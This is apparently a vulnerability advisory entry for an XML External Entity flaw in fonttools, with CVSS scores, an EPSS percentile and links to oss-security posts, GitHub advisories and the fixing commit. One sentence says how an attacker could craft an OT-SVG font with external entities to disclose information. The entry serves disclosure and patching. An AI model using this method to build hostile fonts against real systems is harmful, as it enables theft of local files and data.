CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
Low
EPSS
Percentile
31.2%
fonttools is vulnerable to XML External Entity Injection. The vulnerability is due to a misconfigured xml parser which allows external entities to be included in OT-SVG font. This issue can be exploited by an attacker by building a OT-SVG font which includes xml external entities, resulting in information disclosure.
www.openwall.com/lists/oss-security/2024/03/08/2
www.openwall.com/lists/oss-security/2024/03/09/1
github.com/advisories/GHSA-6673-4983-2vx5
github.com/fonttools/fonttools/commit/9f61271dc1ca82ed91f529b130fe5dc5c9bf1f4c
github.com/fonttools/fonttools/releases/tag/4.43.0
github.com/fonttools/fonttools/security/advisories/GHSA-6673-4983-2vx5
lists.fedoraproject.org/archives/list/[email protected]/message/VY63B4SGY4QOQGUXMECRGD6K3YT3GJ75/